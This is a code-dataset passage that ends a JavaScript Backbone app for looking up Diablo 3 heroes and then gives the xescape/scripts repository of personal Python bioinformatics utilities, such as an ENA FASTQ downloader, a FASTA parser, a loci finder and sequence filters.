\"</button></li>\";\n\t\t\t\t\t\t});\n\t\t\t\t\t\t\n\t\t\t\t\t\t$(\"#hero-list\").html(contents);\n\t\t\t\t\t}\n\t\t\t\t\telse\n\t\t\t\t\t{\n\t\t\t\t\t\tconsole.log(errorCode);\n\t\t\t\t\t\tconsole.log(attr.reason);\n\t\t\t\t\t\t\n\t\t\t\t\t\t$(\"#hero-list\").html(\"\");\n\t\t\t\t\t}\n\t\t\t\t\t\n\t\t\t\t\t$(\"#hero-view\").html(\"\");\n\t\t\t\t},\n\t\t\t\terror: function() {\n\t\t\t\t\t$(\"#hero-list\").html(\"\");\n\t\t\t\t\t$(\"#hero-view\").html(\"\");\n\t\t\t\t\t\n\t\t\t\t\tconsole.log(\"fetch failed\");\n\t\t\t\t}\n\t\t\t})\n\t\t},\n\t\tevents: {\n\t\t\t'click .show': 'findHero'\n\t\t},\n\t\tfindHero: function (ev) {\n\t\t\tvar heroId = $(ev.currentTarget).attr(\"id\");\n\t\t\tvar searchId = this.model + \"@hero@\" + heroId;\n\t\t\t\n\t\t\tvar hereview = new HeroView({model: searchId});\n\t\t\thereview.render();\n\t \t\n\t\t\treturn false;\n\t\t}\n\t});\n\t\n\twindow.user = new User;\n\t\n\twindow.AppView = Backbone.View.extend({\n\t el: $(\"#diablo3app\"),\n\t \n\t events: {\n\t \t\"keypress #search-hero\": \"createOnEnter\"\n\t },\n\t \n\t createOnEnter: function(e) {\n\t \tif (e.keyCode != 13) return;\n\t \t\n\t \tvar inputValue = $(\"#search-hero\").val();\n\t \t\n\t \tvar listview = new HeroListView({model: inputValue});\n\t \tlistview.render();\n\t }\n\t});\n\n\twindow.App = new AppView;\n});"
}
] | 2 |
xescape/scripts
|
https://github.com/xescape/scripts
|
87e3651646cf937ef2302c4d781b253be49b0d2e
|
e178b31dcb28e4d81817c69638abe1b2f45ac2b9
|
453a495770edbbc912aefdb60d5189ce735da367
|
refs/heads/master
| 2020-04-14T07:01:53.403414 | 2019-07-09T18:55:03 | 2019-07-09T18:55:03 | 163,701,842 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6004915237426758,
"alphanum_fraction": 0.6078645586967468,
"avg_line_length": 25.693429946899414,
"blob_id": "ee63670bc73abf4a3bea4d9a0cd9de76c521854e",
"content_id": "26860a1cee4a77ce982266ab56b462ca8aeca9ec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3662,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 137,
"path": "/misc/easyENADownloader.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jan. 2, 2019\nSomehow it seems like our job was easier than expected?\n\n@author: Javi\n'''\n\nimport sys\nimport subprocess as sub\nfrom pathlib import Path\nfrom shutil import rmtree\nfrom multiprocessing import Pool\nimport os\nimport logging\nimport re\n\ndef worker(downloader_path, output_path, acc):\n '''\n process one sample. we're going to assume it's just one acc.\n it's actually impractical to do more than 1.\n '''\n tmp_path = output_path / str(os.getpid())\n os.mkdir(tmp_path)\n \n # print('downloading ' + str(acc))\n logger = logging.getLogger()\n sub.run([downloader_path, '-f', 'fastq', '-d', tmp_path, acc])\n\n os.rename(tmp_path / acc, output_path / acc)\n os.removedirs(tmp_path)\n\n logger.info(acc)\n\n\n\ndef checkForCompletion(accs, log_path, out_path):\n '''\n checks if this acc is in the log. Return true if not there.\n '''\n with open(log_path) as input:\n log_text = input.read()\n\n res = []\n for acc in accs:\n if acc not in log_text or not verify(acc, out_path):\n t = out_path / acc\n if t.is_dir(): \n # i = input(\"Delete partial directory {0}? Y/N\")\n # if i.upper() == 'Y':\n # rmtree(t)\n print('Partial directory found for {0}, moving.'.format(acc))\n t.rename(str(t)+'.old')\n res.append(acc)\n \n \n return res\n\ndef verify(acc, out_path):\n suf_1 = '{0}_1.fastq.gz'\n suf_2 = '{0}_2.fastq.gz'\n\n p1 = out_path / acc / suf_1.format(acc)\n p2 = out_path / acc / suf_2.format(acc)\n\n if p1.is_file() and p2.is_file():\n return True\n else:\n return False\n\ndef loadTable(input_path):\n '''\n We just have a nice txt file with a column full of SRR- accs\n '''\n \n with open(input_path) as input:\n d = input.read()\n \n return d.rstrip('\\n').split('\\n')\n\ndef configLogger(path):\n \n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n \n fh = logging.FileHandler(path)\n fh.setLevel(logging.INFO)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s: \\n %(message)s \\n')\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n \n sh = logging.StreamHandler()\n sh.setFormatter(formatter)\n sh.setLevel(logging.INFO)\n logger.addHandler(sh)\n\n\ndef run(downloader_path, input_path, output_path):\n \n log_path = output_path / 'log.txt'\n configLogger(log_path)\n accs = checkForCompletion(loadTable(input_path), log_path, output_path)\n \n\n print(accs)\n with Pool(processes=4) as pool:\n pool.starmap(worker, [(downloader_path, output_path, acc) for acc in accs])\n \n logger = logging.getLogger()\n logger.info('completed')\n \n \n \n \nif __name__ == '__main__':\n \n# downloader_path = '/d/data/plasmo/enaBrowserTools/python3/enaDataGet'\n# input_path = '/d/data/plasmo/additional_data/test_accs.txt'\n# output_path = '/d/data/plasmo/additional_data'\n\n downloader_path = Path('/d/data/plasmo/enaBrowserTools/python3/enaDataGet')\n input_path = Path('/d/data/plasmo/new_accs.txt')\n output_path = Path('/home/javi/seq')\n\n\n # downloader_path = '/home/j/jparkin/xescape/programs/enaBrowserTools/python3/enaDataGet'\n # input_path = sys.argv[1]\n # output_path = sys.argv[2]\n \n run(downloader_path, input_path, output_path)\n\n\n # #verify only\n # log_path = output_path / 'log.txt'\n # accs = loadTable(input_path)\n # incomplete = [x for x in accs if not verify(x, output_path)]\n # print('incomplete stuff: {0}'.format(str(incomplete)))\n print('ENADownloader Complete.')\n "
},
{
"alpha_fraction": 0.5598171353340149,
"alphanum_fraction": 0.5732791423797607,
"avg_line_length": 31.127119064331055,
"blob_id": "9c2bdf3e18e72a61d41e127defbd32b50b1ee516",
"content_id": "12806f41d17d64655f8a271c1e1d9312d888d357",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3937,
"license_type": "no_license",
"max_line_length": 175,
"num_lines": 118,
"path": "/misc/parsefasta.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "import pandas\r\nimport numpy\r\nimport re\r\nimport multiprocessing as mp\r\nimport timeit\r\nimport os\r\nimport re\r\nimport logging\r\nfrom functools import reduce\r\nfrom collections import deque\r\n\r\ndef read(path):\r\n\r\n with open(path, 'r') as input:\r\n return input.read()\r\n\r\ndef main(path):\r\n configLogger()\r\n logger = logging.getLogger()\r\n logger.info('start')\r\n global main_data\r\n main_data = read(path)\r\n global main_data_length\r\n main_data_length = len(main_data)\r\n\r\n size = main_data_length // mp.cpu_count()\r\n chunks = list(range(0, main_data_length, size))\r\n chunks[-1] = main_data_length\r\n\r\n logger.info('starting map. we have {0} chunks.'.format(len(chunks)-1))\r\n\r\n with mp.Manager() as manager:\r\n res_lists = [manager.list() for i in range(1, len((chunks)))]\r\n\r\n with manager.Pool(processes = mp.cpu_count()) as pool:\r\n pool.starmap(worker, [(l, chunks[i-1], chunks[i], i) for i, l in zip(range(1,len(chunks)), res_lists)])\r\n logger.info('done map')\r\n # final = deque()\r\n # for q in res_lists:\r\n # # print(len(q))\r\n # final.extend(q)\r\n # logger.info('{0} reads processed'.format(len(list(final))))\r\n # print(len(final))\r\n # print(list(res.items())[-1])\r\n\r\n\r\ndef worker(res_list, upper_bound, lower_bound, i):\r\n def oneRead(read_tup):\r\n return read_tup[0], \"\".join(read_tup[1].rstrip('\\n').split('\\n'))\r\n\r\n logger = logging.getLogger()\r\n logger.info('{0} starting chunk {1}'.format(os.getpid(), i))\r\n\r\n header = '>'\r\n pattern = re.compile('(?s)>(.+?)\\n(.+?)(?=\\n>|$)')\r\n section = main_data[upper_bound:lower_bound]\r\n logger.info('{0} starting'.format(os.getpid()))\r\n reads = re.findall(pattern, section)\r\n\r\n logger.info('{0} processing'.format(os.getpid()))\r\n res = [oneRead(read) for read in reads]\r\n\r\n logger.info('{0} lookahead'.format(os.getpid()))\r\n #do the last one\r\n if len(res) >= 1:\r\n lookahead_list = [min(lower_bound + 1000, main_data_length), min(lower_bound + 10000, main_data_length), min(lower_bound + 100000, main_data_length), main_data_length]\r\n last_pattern = re.compile('(?s)>({0})\\n(.+?)(?=\\n>)'.format(re.escape(res[-1][0])))\r\n\r\n\r\n for l in lookahead_list:\r\n section = main_data[upper_bound:l]\r\n last_read = re.search(last_pattern, section)\r\n if last_read:\r\n res[-1] = oneRead((last_read.group(1), last_read.group(2)))\r\n break\r\n\r\n if not last_read:\r\n final_pattern = re.compile('(?s)>({0})\\n(.+?)(?=\\n$)'.format(re.escape(res[-1][0])))\r\n final_read = re.search(final_pattern, main_data[upper_bound:main_data_length])\r\n try:\r\n res[-1] = oneRead((final_read.group(1), final_read.group(2)))\r\n except AttributeError:\r\n logger.info('ATTRIBUTE ERROR by {0} in chunk {1}'.format(os.getpid(), i))\r\n\r\n logger.info('{0} returning'.format(os.getpid()))\r\n # d.update(dict(res))\r\n logger.info('{0} found {1} reads'.format(os.getpid(), len(res)))\r\n res_list.extend(res)\r\n logger.info('{0} FINISHING chunk {1}'.format(os.getpid(), i))\r\n\r\n\r\ndef configLogger():\r\n \r\n logger = logging.getLogger()\r\n logger.setLevel(logging.INFO)\r\n \r\n formatter = logging.Formatter('%(asctime)s:\\n%(message)s\\n')\r\n \r\n sh = logging.StreamHandler()\r\n sh.setLevel(logging.INFO)\r\n sh.setFormatter(formatter)\r\n logger.addHandler(sh)\r\n \r\n return logger\r\n\r\nif __name__ == \"__main__\":\r\n import cProfile\r\n import sys\r\n\r\n loc = sys.argv[1]\r\n\r\n if loc == 'local':\r\n path = '/d/data/sp/test.fasta'\r\n else:\r\n path = '/gpfs/fs0/project/j/jparkin/Lab_Databases/ChocoPhlAn/ChocoPhlAn.fasta'\r\n # path = '/scratch/j/jparkin/xescape/test_big.fasta'\r\n cProfile.run('main(path)', sort='cumtime')\r\n # main(path)\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.4712389409542084,
"alphanum_fraction": 0.5638827681541443,
"avg_line_length": 31.47747802734375,
"blob_id": "5fa05c05c3b5ddce308f7bfbdc78aeed71b95bec",
"content_id": "3d09d55aee62e139b0bd610af73a5731af56d92c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3616,
"license_type": "no_license",
"max_line_length": 730,
"num_lines": 111,
"path": "/misc/LociFinder.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Aug 28, 2017\n\n@author: javi\n\nThis script looks for loci that match some clustering pattern. for example, you can look for\nplaces where a certain group of samples cluster together. Another ver of this script might exist\nsomewhere but I've lost it. \n\n'''\nimport re \nfrom tkinter.tix import ROW\n\ndef loadTabNetwork(path):\n \n with open(path, 'r') as input:\n data = input.read()\n \n rows = re.split('\\n', data)[:-1]\n \n samplelist = re.split('\\t', rows[0])[2:]\n \n pos = []\n rowsplit = []\n for row in rows[1:]:\n tmp = re.split('\\t', row)\n pos.append(tmp[:2])\n rowsplit.append(tmp[2:])\n \n return samplelist, pos, rowsplit\n\ndef patternSearch(pattern, samplelist, data):\n '''pattern here is a 2D list specifying\n which samples are to be clustered together.\n data is the rowsplit'''\n \n def checkrow(row, idxs):\n if isinstance(idxs[0], list):\n if len(idxs) > 1:\n return checkrow(row, idxs[0]) and checkrow(row, idxs[1:])\n else:\n return checkrow(row, idxs[0])\n else:\n return len(set([row[x] for x in idxs])) == 1\n \n result = []\n \n idxs = [[samplelist.index(sample) for sample in row] for row in pattern]\n \n for i, row in enumerate(data):\n if checkrow(row, idxs): result.append(i)\n \n return result\n \n \n \n\ndef condense(rows, size = 1):\n #size now refer to the min size that will count, default 0\n \n results = []\n \n size = size - 1\n pre = 0\n cur = 0\n for row in rows:\n \n if pre == 0:\n pre = row\n cur = row \n\n elif (row - cur) != 1:\n if (cur - pre) > size:\n results.append((pre, cur))\n pre = row\n cur = row\n \n else: cur = row \n \n results.append((pre, row))\n \n return results\n\nif __name__ == '__main__':\n \n directory = '/d/data/neis/results7_d3/cytoscape'\n filename = 'tabNetwork.tsv'\n outname = 'loci.txt'\n \n print('starting!')\n \n# pattern = [[\"3502\",\"ATL_2011_05-13\",\"GCGS011\",\"GCGS012\",\"GCGS018\",\"GCGS062\",\"GCGS084\",\"GCGS100\",\"GCGS128\",\"GCGS144\",\"GCGS167\",\"GCGS173\",\"GCGS174\",\"GCGS176\",\"GCGS192\",\"GCGS193\",\"GCGS197\",\"GCGS198\",\"GCGS201\",\"GCGS202\",\"GCGS203\",\"GCGS204\",\"GCGS207\",\"GCGS209\",\"GCGS211\",\"GCGS213\",\"GCGS215\",\"GCGS217\",\"GCGS224\",\"GCGS226\",\"MU_NG19\",\"MU_NG20\",\"MU_NG3\",\"MU_NG8\",\"NOR_2011_03-06\",\"SK-92-679\",\"USO_BE10-065\",\"USO_DK11-110\",\"USO_G09-060\",\"USO_G09-145\",\"USO_G13-777\",\"USO_GC3828\",\"USO_GC3831\",\"USO_GC3839\",\"USO_GC3861\",\"USO_GC3863\",\"USO_GC3868\",\"USO_GC3877\",\"USO_GC3879\",\"USO_GE12-070\",\"USO_GR10-009\",\"USO_GR13-015\",\"USO_IE11027\",\"USO_IE11068\",\"USO_IE12-018\",\"USO_NL10-083\",\"USO_NL11143\",\"USO_NO10-026\",\"USO_NO2013-031\",\"USO_SI12-018\"]]\n \n# pattern = [[\"32867\", \"GCGS044\", \"GCGS116\", \"GCGS134\", \"MIA_2011_05-16\", \"USO_SP09-048\", \"USO_SP09-062\", \"ALB_2011_03_03\", \"GCGS146\", \"GCGS210\", \"GCGS212\", \"GCGS216\"]]\n\n pattern = [['DK09-023', 'PID1', 'PID18', 'PID24-1', 'PID332']]\n \n samplelist, pos, data = loadTabNetwork('/'.join([directory, filename]))\n rows = patternSearch(pattern, samplelist, data)\n \n crows = condense(rows, 2)\n \n print(crows)\n \n with open('/'.join([directory, outname]), 'w') as output:\n for crow in crows:\n pre = pos[crow[0]]\n post = pos[crow[1]]\n output.write('{0}\\t{1}\\t--\\t{2}\\t{3}\\n'.format(pre[0], pre[1], post[0], post[1]))\n \n print('loci finder finished with {0} results'.format(len(crows))) \n \n \n"
},
{
"alpha_fraction": 0.5203045606613159,
"alphanum_fraction": 0.5262267589569092,
"avg_line_length": 23.14285659790039,
"blob_id": "97aadca3ddb46622a5aa0e729636507fb6f9759d",
"content_id": "ad8ba54c937855b1fa46850ecf7f4456d7d7c591",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1182,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 49,
"path": "/ConsensusChopper/FqFormatter.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Sep 23, 2013\n\n@author: javi\n'''\n\n'''FastA to FastQ!'''\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\nimport re\nfrom .FqBlock import FqBlock\nfrom Bio import SeqIO\n\ndef format(directory, f):\n with open(f, 'r') as source:\n data = source.read()\n re.findall(\">.+?\\n(.+)(?:[>]|$)\")\n\nif __name__ == '__main__':\n #modify these as needed\n directory = ''\n \n #Do not modify\n os.chdir(directory) \n \n if not (os.path.isdir(directory + \"/Formatted\")):\n os.mkdir(\"Formatted\")\n \n chopdirectory = directory + \"/Formatted\"\n \n log = open(chopdirectory + \"/log.txt\", \"w\")\n log.write(\"Run inputs are: \\n%s\" % (directory))\n \n onlyfiles = [ f for f in listdir(directory) if isfile(join(directory,f)) ]\n for f in onlyfiles:\n print(\"\\nProcessing %s ...\" % f)\n log.write(\"\\nProcessing %s ... \" % f)\n \n try: \n if f.split(\".\")[1] == \"fasta\":\n format(directory, f)\n else:\n log.write(\"\\n%s is not a fq file\" % f)\n except:\n log.write(\"\\n%s is not a fq file\" % f)\n \n \n print(\"\\nend of script\")"
},
{
"alpha_fraction": 0.5318664908409119,
"alphanum_fraction": 0.5493171215057373,
"avg_line_length": 24.852941513061523,
"blob_id": "36bfda00c46304616b05cbf7f019e8a4bfa1d670",
"content_id": "cdbda2e9557a0d14f164112ca99b417a16f80789",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2636,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 102,
"path": "/misc/AnalyzeTabNetwork.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jan 26, 2018\n\n@author: javi\n\nFind shared regions in between samples in tab network\n'''\nimport re\n\nglobal targets\n\ndef readHeader(line):\n '''reads the header of tab network, returns a sample list'''\n \n split = re.split('\\t', line.rstrip())\n \n return split[2:]\n\ndef readLine(line):\n '''takes one line, returns a dictionary with {chr, pos, [data]}'''\n\n split = re.split('\\t', line.rstrip())\n chr = split[0]\n pos = split[1]\n data = split[2:]\n \n return {'chr':chr, 'pos':pos, 'data':data}\n\ndef isShared(lineobj, inds):\n '''takes a line dictionary, returns t/f'''\n \n data = lineobj['data']\n rel = [data[i] for i in inds] #relevant data\n \n if(len(rel) == 0):\n raise Exception('isShared: no data in line')\n \n \n return len(set(rel)) <= 2 and rel.count(rel[0]) != 2\n \ndef isSelf(lineobj, ind, color):\n '''like is shared, but looks for self-color''' \n \n data = lineobj['data']\n rel = data[ind] #relevant data\n \n \n try:\n return rel == color\n except:\n raise Exception('isShared: no data in line')\n \n \nif __name__ == '__main__':\n\n# target = 'BE11-020'\n# color = '#003FFF'\n directory = 'D:/documents/data/neis'\n# filepath = 'tabNetwork.tsv'\n# outpath = 'shared.txt'\n# \n# results = []\n# total = 0\n# \n# with open('/'.join([directory, filepath]), 'r') as f:\n# \n# sampleList = readHeader(f.readline())\n# target_ind = sampleList.index(target)\n# \n# for line in f:\n# parsed = readLine(line)\n# total += 1\n# if(isSelf(parsed, target_ind, color)):\n# results.append(parsed)\n# \n# print('{0} self out of total of {1}'.format(len(results), total))\n\n# list = green: '#00FF3F' yellow: '#FFBF00' blue: '#003FFF' pink: '#FF00BF'\n\n# for the old one, where you looked for shared stuff between samples\n targets = ['DK12-38', 'BE11-020']\n# directory = '/data/new/javi/neis/results2/cytoscape'\n filepath = 'tabNetwork.tsv'\n outpath = 'shared.txt'\n \n results = []\n \nwith open('/'.join([directory, filepath]), 'r') as f:\n \n sampleList = readHeader(f.readline())\n target_inds = [sampleList.index(x) for x in targets]\n \n for line in f:\n parsed = readLine(line)\n if(isShared(parsed, target_inds)):\n results.append(parsed)\n \nwith open('/'.join([directory, outpath]), 'w') as f:\n \n for r in results:\n f.write('\\t'.join([r['chr'], r['pos']] + [r['data'][x] for x in target_inds]))\n f.write('\\n')"
},
{
"alpha_fraction": 0.49948611855506897,
"alphanum_fraction": 0.5066803693771362,
"avg_line_length": 19.44444465637207,
"blob_id": "2c2e76a4dc31b866864a46876acf490420c9ab42",
"content_id": "0351a8ac53dda8f1f1a4f4941c4905f940576ed9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 973,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 45,
"path": "/misc/RecursiveTouch.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\r\nCreated on Jan. 12, 2019\r\n\r\n@author: javi\r\n\r\nrecursively touches everything that fits some criteria under a folder.\r\n'''\r\nimport pathlib\r\nimport re\r\n\r\ndef check(name):\r\n '''\r\n checks if a file fits the criteria. modify each time as needed\r\n '''\r\n \r\n patterns = ['.sh', '.fastq']\r\n for p in patterns:\r\n if re.search(p, str(name)):\r\n return True\r\n \r\n return False\r\n\r\ndef recursiveTouch(path):\r\n '''path is a directory'''\r\n \r\n for x in path.iterdir():\r\n if x.is_dir():\r\n recursiveTouch(path/x)\r\n \r\n else:\r\n if check(x):\r\n x.touch()\r\n else:\r\n print('skipping ' + str(x))\r\n\r\nif __name__ == '__main__':\r\n import sys\r\n dir = sys.argv[1]\r\n path = pathlib.Path(dir)\r\n if path.is_dir():\r\n recursiveTouch(path)\r\n else:\r\n raise(FileNotFoundError('this isnt even a directory'))\r\n \r\n print('done!') \r\n "
},
{
"alpha_fraction": 0.5309684872627258,
"alphanum_fraction": 0.539977490901947,
"avg_line_length": 24.028169631958008,
"blob_id": "69644b27fa955fb8e593fcc82977bfd4981f8815",
"content_id": "cb087ccee18dcbf56b846c17c160bcc66e272aac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1776,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 71,
"path": "/misc/ASVfilter.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jun 4, 2018\n\n@author: Javi\n'''\nimport re \n\ndef filter_tsv(data, n):\n '''\n filters an abundance file for the top n, returns as a list of lines\n also returns the id of the ASVs retained for the fsa filter\n '''\n \n def abu_sum(line):\n split = re.split('\\t', line)\n vals = [float(x) for x in split[1:]]\n return sum(vals)\n \n def getname(line):\n split = re.split('\\t',line)\n return split[0]\n \n lines = re.split('\\n', data)[:-1] #there'll be an empty line in the end\n \n header = lines[:2]\n rest = sorted(lines[2:], key=abu_sum, reverse=True)[:n]\n names = [getname(x) for x in rest]\n \n return header + rest, names\n \n \ndef filter_fsa(data, names):\n '''\n takes a fasta, removes any names that don't appear in names\n return as a list of lines\n '''\n \n def check_name(entry):\n name = re.search('>(.+?)\\n', entry).group(1)\n return name in names\n \n seqs = re.split('\\n(?=>)', data)\n \n return filter(check_name, seqs)\n \n \n \n\nif __name__ == '__main__':\n directory = 'D:/cbw'\n prefix = '16S'\n \n fsa = '/'.join([directory, prefix]) + \".fasta\"\n abu = '/'.join([directory, prefix]) + \".tsv\"\n \n fsa_outpath = '/'.join([directory, prefix]) + \"_filtered.fasta\"\n abu_outpath = '/'.join([directory, prefix]) + \"_filtered.tsv\"\n \n with open(abu, 'r') as input:\n tsv_out, names = filter_tsv(input.read(), 100)\n \n with open(abu_outpath, 'w') as output:\n output.write('\\n'.join(tsv_out))\n \n with open(fsa, 'r') as input:\n fsa_out = filter_fsa(input.read(), names)\n \n with open(fsa_outpath, 'w') as output:\n output.write('\\n'.join(fsa_out))\n \n print('done!')"
},
{
"alpha_fraction": 0.5349514484405518,
"alphanum_fraction": 0.5451456308364868,
"avg_line_length": 34.39655303955078,
"blob_id": "b77b78ff19049131edd4e4093698862ebe3c8111",
"content_id": "32ac543fca64929373def3fc8ddaf909a6ac442c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4120,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 116,
"path": "/Proteins/SequenceSelect.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jun 18, 2014\n\n@author: javi\n'''\n'''picks out the sequences from the fasta file that were hits in the HMM search. \n\nOverview:\n\nRequires: filename, identifying the strain. Folder of all the fastas. folder with all hmmr files. \n\n1. read the hmmr files, get name + id of all proteins\n2. for each protein id, look in the corresponding fasta file and grab that chunk. \n3. append the stain name to the front of the protein ID so it'd be like ARI_TGME49_27900\n4. write one file for each strain.\n'''\nimport re\nimport os \n'''String -> (name, list)\nreads the HMMR file'''\ndef parseHMMR(filepath):\n with open(filepath, 'r') as input:\n data = input.read()\n proteins = re.findall(\"(?m)^>>((.+?)\\s+.+)$\", data)\n print(\"{0} proteins read from {1}\".format(len(proteins), re.match(\"^(.+?)[.].+$\", filepath).group(1)))\n return proteins\n\n'''String, list -> list\nthe returned list already have the strain name attached to it''' \ndef findSequences(fastaFilepath, seqList, strain):\n with open(fastaFilepath, 'r') as input:\n data = input.read()\n results = []\n for protein in seqList:\n ID = \">{0}\".format(protein[0])\n seq = re.search(\"(?s)>{0}\\s.+?\\n(.+?)(?=\\n>|$)\".format(protein[1]), data).group(1)\n results.append(\"\\n\".join([ID, seq]))\n return results\n \n'''string, list -> none (output)\nwrites the fasta files'''\ndef writeFasta(filepath, list):\n with open(filepath, 'w') as output:\n output.write(\"\\n\".join(list))\n print(\"{0} proteins wrote to {1}\".format(len(list), re.match(\"^(.+?)[.].+$\", filepath).group(1)))\n\n'''string, string, string, string -> none (output)\nprimary running method for this script'''\ndef select(hmmrpath, fastapath, outputpath, strain):\n seqList = parseHMMR(hmmrpath)\n sequences = findSequences(fastapath, seqList, strain)\n writeFasta(outputpath, sequences)\n\n\n\ndef filter(filepath, outpath):\n with open(filepath) as input, open(outpath, 'w') as output:\n data = input.read()\n lines = re.split(\"\\n\", data)\n results = []\n for index, line in enumerate(lines):\n good = [\"Group_{0}:\".format(index+1)]\n try:\n removeHeader = re.match(\"^.+?: (.+)$\", line).group(1)\n except:\n continue\n elements = re.split(\"\\s\", removeHeader)\n for e in elements:\n if not re.match(\"^ham\", e):\n good.append(e)\n results.append(good)\n \n print(\"filtered {0} lines\".format(index))\n \n count = 0\n for line in results:\n output.write(\" \".join(line) + \"\\n\")\n \ndef toName(filepath, hmmrDirectory, outpath):\n hmmrFiles = [ x for x in os.listdir(hmmrDirectory) if os.path.isfile(\"/\".join([hmmrDirectory,x]))]\n proteins = []\n proteinDict = {}\n for f in hmmrFiles:\n proteins += parseHMMR(\"/\".join([hmmrDirectory,f]))\n for protein in proteins:\n proteinDict[protein[1]] = re.search(\"\\s+?(\\w.+)$\", protein[0]).group(1)\n \n with open(filepath) as input, open(outpath, 'w') as output:\n data = input.read()\n lines = re.split(\"\\n\", data)\n results = []\n for index, line in enumerate(lines):\n try:\n removeHeader = re.match(\"^.+?: (.+)$\", line).group(1)\n except:\n continue\n elements = re.split(\"\\s\", removeHeader)\n results.append([re.split(\"[|]\", x) for x in elements])\n \n for line in results:\n towrite = []\n lineNames = []\n for element in line:\n strain = element[0]\n name = proteinDict[element[1]]\n \n srs = re.search(\"SRS.*$\", name)\n if srs:\n name = srs.group(0)\n \n if name in lineNames:\n name = \"-\"\n else: lineNames.append(name)\n towrite.append(\"{1}_{0}\".format(strain, name))\n \n output.write(\",\".join(towrite) + \"\\n\")\n\n \n "
},
{
"alpha_fraction": 0.46076643466949463,
"alphanum_fraction": 0.4689781069755554,
"avg_line_length": 23.377777099609375,
"blob_id": "b4ea031f632b7ef8c7ebc9a711ef20c3f9799cb3",
"content_id": "20bc36f770a59bc3a8eafa94f97107741a837407",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1096,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 45,
"path": "/misc/SequenceNumberCounter.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "import re\n\n\n\ndef parse(inpath):\n \n with open(inpath, 'r') as input:\n \n results = {} \n \n for i, line in enumerate(input):\n try:\n date = re.split('\\t', line)[14]\n year = int(re.split('/', date)[0])\n try:\n results[year] += 1\n except:\n results[year] = 0\n except:\n if(i==0): pass\n else:\n print('{0} gave an error!'.format(line))\n \n return results\n\n\ndef output(results, outpath):\n \n with open(outpath, 'w') as output:\n output.write('year\\tcount\\n')\n for key in sorted(results.keys()):\n output.write('{0}\\t{1}\\n'.format(key, results[key]))\n\nif __name__ == \"__main__\":\n directory = '/d/data'\n filename = 'eukaryotes.txt'\n inpath = '/'.join([directory, filename])\n outname = 'euseqnums.tsv'\n outpath = '/'.join([directory, outname])\n \n results = parse(inpath)\n \n output(results, outpath)\n \n print('seqnumcount complete.')"
},
{
"alpha_fraction": 0.5241614580154419,
"alphanum_fraction": 0.5289937257766724,
"avg_line_length": 32.19811248779297,
"blob_id": "f081b6558e13112cd77997d482a2a33d94cf4c3e",
"content_id": "9ff4d3cd42c0f8c2c4db7cb89de5d07495d2790b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3518,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 106,
"path": "/ConsensusChopper/ConsensusChopper.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Sep 16, 2013\n\n@author: javi\n'''\n\n# Breaks a given FQ sequence into 150 bp fragments, with 50bp overlab on either side.\n# Input: name of fastq file\n# Output: chopped up fastq file, separate copy, in a subfolder called \"Chopped\"\n# Notes: Only works for fastQ!\n\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\nimport re\nfrom .FqBlock import FqBlock\n \n \n\n \ndef chop(directory, chopdirectory, sourcename, identifier, length, overlap, newlog):\n# initialize\n\n nextblockid = \"\"\n \n with open(sourcename, \"r\") as source:\n print(\"\\nreading file %s ...\" % sourcename)\n data = source.read()\n print(\"done.\")\n \n with open(\"%s/%s-chopped.fq\" % (chopdirectory, sourcename.split(\".\")[0]), \"w\") as product:\n \n # identifying blocks. Each block processes and writes itself into the file.\n eof = False\n currentblock = FqBlock(length, overlap)\n \n while(not eof):\n g = re.match(\"(?is)(@%s.*?)\\n([a-zA-Z\\n]*?)\\n\\+\\n(.*?)(@%s.*)\" % (identifier, identifier), data)\n if not g:\n g = re.match(\"(?is)(@%s.*?)([a-zA-Z\\n]*?)\\n\\+\\n(.*?)$\" % (identifier), data)\n eof = True\n currentblock.setSeqid(g.group(1))\n currentblock.setSequence(g.group(2).replace('\\n', ''))\n currentblock.setQscore(g.group(3).replace('\\n', ''))\n currentblock.write(product)\n try:\n data = g.group(4)\n except:\n log.write(\"\\n%s reached eof\" % sourcename)\n \n \n# currentblock.reset()\n# currentblock.setSeqid(nextblockid)\n# inblock = 